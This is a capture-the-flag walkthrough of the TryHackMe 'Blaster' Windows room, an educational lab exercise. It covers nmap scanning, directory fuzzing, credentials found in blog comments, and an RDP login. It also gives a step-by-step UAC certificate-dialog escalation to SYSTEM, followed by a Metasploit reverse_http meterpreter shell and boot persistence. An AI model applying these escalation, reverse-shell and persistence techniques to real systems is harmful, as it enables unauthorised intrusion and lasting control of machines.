[TryHackMe] Blaster - Walkthrough -


This post walks through the "Blaster" room offered on TryHackMe.
"Blaster" is provided as a free room: the virtual machine can be deployed without a subscription.

[Task 1] – Mission Start!

Task 1 - #1.

Deploy the machine! This is a Windows box so give it a few minutes (3-5 at max) to come online

This question requires no answer.

First, click the [Deploy] button to start the target machine.

[Task 2] – Activate Forward Scanners and Launch Proton Torpedoes

Task 2 - #1

How many ports are open on our target system?

This task asks how many ports are open on blaster.thm.

Add the IP address 10.10.106.91 to /etc/hosts as blaster.thm, then run a port scan with nmap.

kali@kali:~$ nmap -Pn -T4 -A -v blaster.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 21:06 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:06
Completed NSE at 21:06, 0.00s elapsed
Initiating NSE at 21:06
Completed NSE at 21:06, 0.00s elapsed
Initiating NSE at 21:06
Completed NSE at 21:06, 0.00s elapsed
Initiating Connect Scan at 21:06
Scanning blaster.thm (10.10.106.91) [1000 ports]
Discovered open port 139/tcp on 10.10.106.91
Discovered open port 445/tcp on 10.10.106.91
Discovered open port 3389/tcp on 10.10.106.91
Discovered open port 135/tcp on 10.10.106.91
Discovered open port 80/tcp on 10.10.106.91
Discovered open port 3306/tcp on 10.10.106.91
Increasing send delay for 10.10.106.91 from 0 to 5 due to 213 out of 532 dropped probes since last increase.
Increasing send delay for 10.10.106.91 from 5 to 10 due to max_successful_tryno increase to 5
Completed Connect Scan at 21:06, 31.15s elapsed (1000 total ports)
Initiating Service scan at 21:06
Scanning 6 services on blaster.thm (10.10.106.91)
Completed Service scan at 21:08, 101.65s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.106.91.
Initiating NSE at 21:08
Completed NSE at 21:08, 10.12s elapsed
Initiating NSE at 21:08
Completed NSE at 21:08, 1.79s elapsed
Initiating NSE at 21:08
Completed NSE at 21:08, 0.00s elapsed
Nmap scan report for blaster.thm (10.10.106.91)
Host is up (0.29s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp  open  msrpc              Microsoft Windows RPC
139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open  mysql              MySQL (unauthorized)
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: RETROWEB
|   NetBIOS_Domain_Name: RETROWEB
|   NetBIOS_Computer_Name: RETROWEB
|   DNS_Domain_Name: RetroWeb
|   DNS_Computer_Name: RetroWeb
|   Product_Version: 10.0.14393
|_  System_Time: 2020-09-25T01:08:15+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Issuer: commonName=RetroWeb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-21T21:44:38
| Not valid after:  2020-11-20T21:44:38
| MD5:   dc1a 219e aee5 c428 1a53 5c03 7a4c 9a6f
|_SHA-1: b359 f8c9 6c31 2619 957a a417 78fa 8347 c1d8 7da7
|_ssl-date: 2020-09-25T01:08:24+00:00; -1s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-25T01:08:16
|_  start_date: 2020-09-25T00:53:24

NSE: Script Post-scanning.
Initiating NSE at 21:08
Completed NSE at 21:08, 0.00s elapsed
Initiating NSE at 21:08
Completed NSE at 21:08, 0.00s elapsed
Initiating NSE at 21:08
Completed NSE at 21:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.63 seconds
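
As an added example (not part of the original walkthrough), the following Python script parses the port table and host-script section of nmap's normal output shown above, counts the open ports, and flags the findings nmap itself marks as risky or dangerous; the sample input is constructed from the scan lines above.

```python
import re

# Constructed sample: port-table and host-script lines from the nmap output above.
NMAP_OUTPUT = """\
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 10.0
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc              Microsoft Windows RPC
139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open  mysql              MySQL (unauthorized)
3389/tcp open  ssl/ms-wbt-server?
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

# One port-table row: "<port>/<proto>  <state>  <service>  [<version>]".
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_ports(text):
    """Return (port, proto, state, service, version) for every port-table row."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            rows.append((int(port), proto, state, service, version.strip()))
    return rows

def open_ports(text):
    """Open port numbers in scan order; len() of this answers Task 2 - #1."""
    return [r[0] for r in parse_ports(text) if r[2] == "open"]

REMOTE_ADMIN_PORTS = {3389: "RDP", 445: "SMB", 3306: "MySQL"}  # not for untrusted networks

def risky_findings(text):
    """NSE lines nmap itself labels risky/dangerous, plus exposed admin services."""
    findings = []
    for line in text.splitlines():
        body = line.lstrip("|_ ").strip()
        if "Potentially risky methods" in body or "dangerous" in body:
            findings.append(body)
    for port, _, state, _, _ in parse_ports(text):
        if state == "open" and port in REMOTE_ADMIN_PORTS:
            findings.append(f"{port}/tcp ({REMOTE_ADMIN_PORTS[port]}) exposed")
    return findings
```

Run against a full `nmap -oN` file, the same functions give a quick inventory of what a scan like this one exposes before any exploitation is attempted.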

Task 2 - #2.

Looks like there's a web server running, what is the title of the page we discover when browsing to it?

This task asks for the title of the page served by the blaster.thm website.

Open port 80/tcp on blaster.thm in the Firefox browser.

The answer can also be read directly from the http-title: line of the nmap output.

80/tcp   open  http               Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server

Task 2 - #3.

Interesting, let's see if there's anything else on this web server by fuzzing it. What hidden directory do we discover?

This task asks for a hidden directory on the blaster.thm website.

Use wfuzz to fuzz port 80/tcp on blaster.thm.

kali@kali:~$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://blaster.thm/FUZZ --hc 404,403 -t 100

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://blaster.thm/FUZZ
Total requests: 20473

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                   
===================================================================

000015426:   301        1 L      10 W     149 Ch      "retro"                                                                                   

Total time: 177.6230
Processed Requests: 20473
Filtered Requests: 20472
Requests/sec.: 115.2609

Task 2 - #4.

Navigate to our discovered hidden directory, what potential username do we discover?

This task asks for information that appears to be a username.

Using Firefox, browse to the directory enumerated in Task 2 - #3.
The site is a blog, and the post author's name can be identified from it.

Task 2 - #5.

Crawling through the posts, it seems like our user has had some difficulties logging in recently. What possible password do we discover?

This task asks for information that appears to be a password.

In the comments on the post about "Ready Player One", the following note can be found:

Leaving myself a note here just in case I forget how to spell it: parzival

Task 2 - #6.

Log into the machine via Microsoft Remote Desktop (MSRDP) and read user.txt. What are its contents?

This task asks to log in to blaster.thm via Microsoft Remote Desktop (MSRDP) and retrieve the user.txt flag.

Install remmina (a remote desktop client):

kali@kali:~$ sudo apt-get install remmina

Connect to RDP on blaster.thm with the wade:parzival account.

A user.txt file is visible on the desktop.

Checked from the command prompt, the file on the desktop is actually named "user.txt.txt":

C:\Users\Wade\Desktop>type user.txt.txt                                     
{BLOCKED}

Run the systeminfo command to collect detailed system information:

C:\Users\Wade>systeminfo

Host Name:                 RETROWEB
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                {BLOCKED}
Original Install Date:     12/8/2019, 10:50:43 PM
System Boot Time:          9/24/2020, 5:49:22 PM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
BIOS Version:              Xen 4.2.amazon, 8/24/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     512 MB
Available Physical Memory: 92 MB
Virtual Memory: Max Size:  1,182 MB
Virtual Memory: Available: 184 MB
Virtual Memory: In Use:    998 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\RETROWEB
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB3192137
Network Card(s):           1 NIC(s) Installed.
                           [01]: AWS PV Network Device
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.1
                                 IP address(es)
                                 [01]: 10.10.106.91
                                 [02]: fe80::c993:9bcc:9861:1fd2
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

[Task 3] – Breaching the Control Room.

Task 3 - #1.

When enumerating a machine, it's often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it?

???

This is a privilege escalation vulnerability in the Windows certificate dialog. It allows an attacker to elevate privileges to NT AUTHORITY\SYSTEM.

Task 3 - #2.

Looks like an executable file is necessary for exploitation of this vulnerability and the user didn't really clean up very well after testing it. What is the name of this executable?

Check the contents of the "Recycle Bin". Restore the file in preparation for answering #3 and #4.

Task 3 - #3.

Research vulnerability and how to exploit it. Exploit it now to gain an elevated terminal!

This question requires no answer.

Task 3 - #4.

Now that we’ve spawned a terminal, let’s go ahead and run the command ‘whoami’. What is the output of running this?


  1. Run the restored hhupd.exe file as administrator (right-click -> Run as administrator).
  2. The User Account Control window appears. Click the "Show more details" link.
  3. Click the "Show information about the publisher's certificate" link.
  4. Click the "VeriSign Commercial Software Publishers CA" link.
  5. Choose File > Save as...
  6. A "Location is not available" error occurs.
  7. Enter "c:\Windows\System32\*.*" in the "File name" field.
  8. Select "cmd.exe", right-click it and choose Open.
  9. Elevation to NT AUTHORITY\SYSTEM succeeds.

Task 3 - #5.

Now that we’ve confirmed that we have an elevated prompt, read the contents of root.txt on the Administrator’s desktop. What are the contents? Keep your terminal up after exploitation so we can use it in task four!

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\System32>whoami
nt authority\system

C:\Windows\System32>cd \

C:\>cd Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
{BLOCKED}

[Task 4] – Adoption into the Collective

Task 4 - #1.

Launch Metasploit now and select 'exploit/multi/script/web_delivery' for use.

This question requires no answer.

Task 4 - #2.

First, let's set the target to PSH (PowerShell). Which target number is PSH?

Task 4 - #3.

After setting your payload, set your lhost and lport accordingly such that you know which port the MSF web server is going to run on and that it'll be running on the TryHackMe network.

This question requires no answer.

Task 4 - #4.

Finally, let's set our payload. In this case, we'll be using a simple reverse HTTP payload. Do this now with the command: 'set payload windows/meterpreter/reverse_http'. Following this, launch the attack as a job with the command 'run -j'.

This question requires no answer.

Task 4 - #5.

Return to the terminal we spawned with our exploit. In this terminal, paste the command output by Metasploit after the job was launched. In this case, I've found it particularly helpful to host a simple python web server (python3 -m http.server) and host the command in a text file as copy and paste between the machines won't always work. Once you've run this command, return to our attacker machine and note that our reverse shell has spawned.

This question requires no answer.

Task 4 - #6.

Last but certainly not least, let's look at persistence mechanisms via Metasploit. What command can we run in our meterpreter console to setup persistence which automatically starts when the system boots? Don't include anything beyond the base command and the option for boot startup.

Task 4 - #7.

Run this command now with options that allow it to connect back to your host machine should the system reboot. Note, you'll need to create a listener via the handler exploit to allow for this remote connection in actual practice. Congrats, you've now gained full control over the remote host and have established persistence for further operations!

This question requires no answer.